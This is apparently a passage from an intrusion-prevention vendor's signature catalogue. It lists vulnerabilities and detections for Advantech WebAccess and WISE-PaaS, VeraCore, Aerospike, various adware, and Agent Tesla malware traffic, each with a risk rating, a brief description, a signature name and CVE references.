Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. The vulnerability is due to insufficient input validation of the ip_addr parameter contained in the webeye.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Webeye.ocx-Obsolete-ActiveX-Control-Usage
References:
CVE-2014-8388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8388
BID-71193
http://www.securityfocus.com/bid/71193
OSVDB-114842
http://www.osvdb.org/114842
Back to top

Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the AccessCode parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow
References:
CVE-2014-0767
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0767
BID-66728
http://www.securityfocus.com/bid/66728
BID-66732
http://www.securityfocus.com/bid/66732
OSVDB-105566
http://www.osvdb.org/105566
OSVDB-105567
http://www.osvdb.org/105567
Back to top

Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the GotoCmd parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow
References:
CVE-2014-0765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0765
BID-66722
http://www.securityfocus.com/bid/66722
OSVDB-105564
http://www.osvdb.org/105564
Back to top

Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the NodeName parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow
References:
CVE-2014-0764
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0764
BID-66718
http://www.securityfocus.com/bid/66718
BID-66725
http://www.securityfocus.com/bid/66725
OSVDB-105573
http://www.osvdb.org/105573
OSVDB-105565
http://www.osvdb.org/105565
Back to top

Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack buffer overflow exists in Advantech's WebAccess SCADA software. This is due to insufficient input validation on the UserName parameter of the webvact.ocx ActiveX control, a part of the WebAccess Client. A remote, unauthenticated attacker could exploit this vulnerability by enticing a vulnerable user to open a crafted web page. Successful exploitation could lead to code execution in the context of the target user.
Situation: File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow
References:
CVE-2014-0770
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0770
BID-66733
http://www.securityfocus.com/bid/66733
OSVDB-105567
http://www.osvdb.org/105567
Back to top

Advantech-WebAccess-Soap-Request-SQL-Injection

About this vulnerability: An Advantech WebAccess Soap Request SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: A vulnerability in Advantech WebAccess, versions 7.1 and before, which allows remote attackers to gain username and password information by executing arbitrary SQL commands via SOAP requests to ChartThemeConfig.svc.
Situation: HTTP_CRL-Advantech-WebAccess-Soap-Request-SQL-Injection
References:
CVE-2014-0763
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0763
BID-66740
http://www.securityfocus.com/bid/66740
OSVDB-105572
http://www.osvdb.org/105572
Back to top

Advantech-WebAccess-SQL-Injection

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There is an SQL injection vulnerability in Advantech WebAccess which may allow remote authenticated users to execute SQL commands via a malformed URL.
Situation: HTTP_CSU-Advantech-WebAccess-SQL-Injection
References:
CVE-2012-1234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1234
Back to top

Advantech-WebAccess-Stack-Based-Buffer-Overflow

About this vulnerability: An Advantech WebAccess Stack Based Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A stack based buffer overflow in Advantech WebAccess, versions before 7.2, which allow remote attackers to execute arbitrary code via a long string in the following parameters: ProjectName, SetParameter, NodeName, CCDParameter, SetColor, AlarmImage, GetParameter, GetColor, ServerResponse, SetBaud, and IPAddress.
Situation: File-Text_Advantech-WebAccess-Stack-Based-Buffer-Overflow
References:
CVE-2014-2364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2364
BID-68714
http://www.securityfocus.com/bid/68714
Back to top

Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Input Validation
Description: Insufficient validation of the parameters given to updateTemplate.aspx results in an SQL injection vulnerability in Advantech WebAccess. A successful exploitation allows an attacker to read and modify information in the database.
Situation: HTTP_CRL-Advantech-WebAccess-Updatetemplate.aspx-SQL-Injection
References:
CVE-2017-5154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5154
Back to top

Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1086-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: Improper validation of the length of user-supplied data before copying it to a fixed-length heap buffer causes a heap buffer overflow vulnerability in Advantech WebAccess. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Viewdll1-Heap-Buffer-Overflow
References:
CVE-2018-8845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8845
Back to top

Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: There exists a stack buffer overflow vulnerability in Advantech's WebAccess SCADA software. A successful exploitation could result in code execution in the security context of the target user.
Situation: File-TextId_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
References:
CVE-2014-9208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9208
Back to top

Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: Improper validation of paths in requests causes an arbitrary file deletion vulnerability in Advantech WebAccess. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Arbitrary-File-Deletion
References:
CVE-2018-7495
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7495
Back to top

Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: High
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Directory Traversal
Description: There has been reported a directory traversal and remote code execution vulnerability in Advantech WebAccess software. A remote unauthenticated attacker can exploit this vulnerability by sending a maliciously crafted request to the target service. Successful exploitation could lead to remote code execution.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Directory-Traversal-Remote-Code-Execution
References:
CVE-2017-16720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16720
BID-102424
http://www.securityfocus.com/bid/102424
Back to top

Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Platform: Generic
Software: Advantech WebAccess
Type: Malfunction
Description: There exists a buffer overflow vulnerability in Advantech WebAccess.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Projectname-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Advantech WebAccess
Type: Malfunction
Description: A vulnerability in Advantech WebAccess
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-BwWebSvc.dll-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c71-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: An improper boundary check in the RPC interface of Advantech WebAccess results in a vulnerability which can be exploited to gain System-privileged code execution on the target host.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Function-0x013c80-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow

About this vulnerability: A vulnerability in Advantech WebAccess
Risk: Moderate
First detected in: sgpkg-ips-747-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WebAccess
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Advantech WebAccess can be exploited with a crafted MSRPC request, allowing an attacker to execute code on the target system with the privileges of the SYSTEM user.
Situation: MSRPC-TCP_CPS-Advantech-WebAccess-Webvrpcs-Service-Strncpy-Buffer-Overflow
References:
CVE-2016-0856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0856
Back to top

Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: There exists a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in disclosure of file contents.
Situation: HTTP_CRL-Advantech-WISE-PaaS-RMM-Accountmgmt-Activateaccount-External-Entity-Injection
References:
CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227
Back to top

Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: A SQL injection exists in Advantech WISE-PaaS RMM. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class DeviceMgmt. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests. Successful exploitation could result in the code execution under the security context of the database process.
Situation: HTTP_CRL-Advantech-WISE-PaaS-RMM-DeviceMgmt-fuzzySearch-SQL-Injection
References:
CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229
Back to top

Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: There exists a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in disclosure of file contents.
Situation: HTTP_CRL-Advantech-WISE-PaaS-RMM-Recoverymgmt-Checkschname-External-Entity-Injection
References:
CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227
Back to top

Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: A SQL injection exists in Advantech WISE-PaaS RMM. The vulnerability is due to insufficient input validation when processing HTTP requests in the Java class SQLMgmt. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests. Successful exploitation could result in the code execution under the security context of the database process.
Situation: HTTP_CRL-Advantech-WISE-PaaS-RMM-SQLMgmt-getTableInfo-SQL-Injection
References:
CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229
Back to top

Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: Improper input validation when processing HTTP requests in the Java class SQLMgmt causes an SQL injection vulnerability in Advantech WISE PaaS. A successful exploit may allow an attacker to execute code with the privileges of the database.
Situation: File-Text_Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection
References:
CVE-2019-18229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18229
Back to top

Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: There is a post-auth arbitrary file upload vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in arbitrary file write and code execution.
Situation: HTTP_CS-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
HTTP_CRL-Advantech-WISE-PaaS-RMM-Upgrademgmt-Upload_ota-Arbitrary-File-Upload
References:
CVE-2019-13551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13551
Back to top

Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload

About this vulnerability: A vulnerability in Advantech WISE-PaaS RMM
Risk: High
First detected in: sgpkg-ips-1206-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: There exists a vulnerability in Advantech WISE-PaaS RMM, versions 3.3.29 and before, which allows remote attackers to upload arbitrary files and execute remote code, due to the insufficient input validation in the DeviceMapMgmt Java class.
Situation: HTTP_CS-Advantech-WISE-PaaS-RMM-upload2eMap-LastMapName-Arbitrary-File-Upload
References:
CVE-2019-13551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13551
Back to top

Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection

About this vulnerability: A vulnerability in Advantech WISE-PaaS/RMM
Risk: Moderate
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Advantech WISE-PaaS RMM
Type: Input Validation
Description: There has been reported a pre-auth XXE vulnerability in Advantech WISE-PaaS RMM. Successful exploitation could lead in information disclosure.
Situation: HTTP_CRL-Advantech-WISE-PaaS-RMM-Wechatsignin-Wechattokenlogin-External-Entity-Injection
References:
CVE-2019-18227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18227
Back to top

Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181

About this vulnerability: A vulnerability in Advantive VeraCore
Risk: High
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Generic
Software: Advantive VeraCore
Type: SQL Injection
Description: An SQL injection vulnerability in Advantive VeraCore allows unauthenticated attackers to execute arbitrary SQL commands via a crafted HTTP parameter value. This vulnerability can be leveraged for obtaining any existing VeraCore user credentials, allowing further compromise of the software.
Situation: HTTP_CRL-Advantive-VeraCore-PmSess1-SQL-Injection-CVE-2025-25181
References:
CVE-2025-25181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25181
Back to top

Adware-180sa

About this vulnerability: Adware 180SA
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: 180SA
Type: Misconfiguration
Description: 180SA is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-180sa
HTTP_CSH-Adware-180sa
Back to top

Adware-Adroar

About this vulnerability: Adware Adroar
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adroar
Type: Misconfiguration
Description: Adroar is an adware that can generate pop-up ads. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Adroar
Back to top

Adware-Adtomi

About this vulnerability: Adware Adtomi
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Adtomi
Type: Misconfiguration
Description: Adtomi is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Adtomi
HTTP_CSH-Adware-Adtomi
Back to top

Adware-Bdsearch

About this vulnerability: Adware BDSearch
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: BDSearch
Type: Misconfiguration
Description: BDSearch is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Bdsearch
Back to top

Adware-Casclient

About this vulnerability: Adware CasClient
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CasClient
Type: Misconfiguration
Description: CasClient is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Casclient
Back to top

Adware-Commonname

About this vulnerability: Adware CommonName
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: CommonName
Type: Misconfiguration
Description: CommonName is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Commonname
HTTP_CSH-Adware-Commonname
Back to top

Adware-Exactsearch

About this vulnerability: Adware Exactsearch
Risk: Low
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exactsearch
Type: Misconfiguration
Description: Exactsearch is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Exactsearch
HTTP_CSH-Adware-Exactsearch
Back to top

Adware-Ilookup

About this vulnerability: Adware ILookup
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ILookup
Type: Misconfiguration
Description: ILookup is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Ilookup
HTTP_CSH-Adware-Ilookup
Back to top

Adware-mysearch

About this vulnerability: Adware MySearch
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MySearch
Type: Misconfiguration
Description: MySearch is a search bar application that integrates with Internet Explorer. It is not a virus or a trojan, however it is detected as a potentially unwanted program.
Situation: HTTP_CSH-Adware-mysearch
Back to top

Adware-Pornkings

About this vulnerability: Adware PornKings
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: PornKings
Type: Misconfiguration
Description: PornKings is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Pornkings
Back to top

Adware-Rapidblaster

About this vulnerability: Adware RapidBlaster
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: RapidBlaster
Type: Misconfiguration
Description: RapidBlaster is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: Generic_UDP-W32/Nuwar@mm-Activity
HTTP_CSH-Adware-Rapidblaster
Back to top

Adware-Searchaid

About this vulnerability: Adware SearchAid
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SearchAid
Type: Misconfiguration
Description: SearchAid is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Searchaid
Back to top

Adware-Searchcentrix

About this vulnerability: Adware Searchcentrix
Risk: Low
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Searchcentrix
Type: Misconfiguration
Description: Searchcentrix is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Searchcentrix
HTTP_CSH-Adware-Searchcentrix
Back to top

Adware-Sidesearch

About this vulnerability: Adware SideSearch
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SideSearch
Type: Misconfiguration
Description: Sidesearch is an adware that integrates with Internet Explorer. It is not a virus or a trojan, however it is detected as a potentially unwanted program.
Situation: HTTP_CSU-Adware-Sidesearch
HTTP_CSH-Adware-Sidesearch
Back to top

Adware-Slotch

About this vulnerability: Adware Slotch
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Slotch
Type: Misconfiguration
Description: Slotch is an adware. It is detected as a potentially unwanted program.
Situation: HTTP_CSU-Adware-Slotch
HTTP_CSH-Adware-Slotch
Back to top

Adware-Tickerbar

About this vulnerability: Adware TickerBar
Risk: Low
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TickerBar
Type: Misconfiguration
Description: TickerBar is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CS-Adware-Tickerbar
HTTP_CSH-Adware-Tickerbar
Back to top

Adware-Toolbarcc

About this vulnerability: Adware ToolbarCC
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ToolbarCC
Type: Misconfiguration
Description: ToolbarCC is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Toolbarcc
HTTP_CRL-Adware-Toolbarcc
Back to top

Adware-Tvmedia

About this vulnerability: Adware TVMedia
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: TVMedia
Type: Misconfiguration
Description: TVMedia is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Adware-Tvmedia
HTTP_CSH-Adware-Tvmedia
Back to top

Adware-Websearch

About this vulnerability: Adware Websearch
Risk: Low
First detected in: sgpkg-ips-617-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Websearch
Type: Misconfiguration
Description: Websearch is an adware that adds a toolbar to Internet Explorer. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Adware-Websearch
Back to top

Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE

About this vulnerability: A vulnerability in Aerohive NetConfig
Risk: High
First detected in: sgpkg-ips-1421-5242
Last changed: sgpkg-ips-1421-5242
Platform: Generic
Software: Aerohive NetConfig
Type: Input Validation
Description: A vulnerability in Aerohive NetConfig, versions 8.2r4 and 10.0r7a, which allows remote attackers to execute arbitrary code due to insufficient input validation to the userName parameter, allowing for local file inclusion and log poisoning attacks.
Situation: HTTP_CRL-Aerohive-NetConfig-LFI-And-Log-Poisoning-To-RCE
References:
CVE-2020-16152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16152
Back to top

Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Aerospike Database Server
Risk: Moderate
First detected in: sgpkg-ips-846-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Aerospike Database Server
Type: Buffer Overflow
Description: Improper bounds checks in Aerospike Database Server cause a stack buffer overflow vulnerability, which when successfully exploited can allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Aerospike-Database-Server-As_Sindex-Simatch_By_Iname-Stack-Buffer-Overflow
References:
CVE-2016-9052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9052
Back to top

Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution

About this vulnerability: A vulnerability in Aerospike Database Server
Risk: High
First detected in: sgpkg-ips-866-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Aerospike Database Server
Type: Malfunction
Description: There exists an out-of-bounds array indexing vulnerability in Aerospike Database Server. A remote attacker can use this to cause a denial-of-service condition.
Situation: Generic_CS-Aerospike-Database-Server-Rw-Fabric-Message-Code-Execution
References:
CVE-2016-9053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9053
Back to top

Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054

About this vulnerability: A vulnerability in Aerospike Database Server
Risk: Moderate
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Aerospike Database Server
Type: Buffer Overflow
Description: Improper bounds checks in Aerospike Database Server cause a stack buffer overflow vulnerability, which when successfully exploited can allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Aerospike-Database-Server-Stack-Buffer-Overflow-CVE-2016-9054
References:
CVE-2016-9054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9054
Back to top

Agent-Tesla-C2-Traffic

About this vulnerability: Agent Tesla C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Agent Tesla is a keystroke logger. It can send keystroke logs and screenshots from infected computers to remote servers using HTTP or SMTP protocol.
Situation: HTTP_CRL-Agent-Tesla-C2-Traffic
Back to top

Agent-Tesla-Malware-Infection-Traffic

About this vulnerability: Agent Tesla malware infection traffic detected
Risk: High
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Agent Tesla malware infection traffic was detected.
Situation: HTTP_CS-Agent-Tesla-Malware-Infection-Traffic
Back to top

Agent-Tesla-Panel-Remote-Code-Execution

About this vulnerability: A vulnerability in Agent Tesla.
Risk: High
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Platform: Generic
Software: Agent Tesla
Type: Input Validation
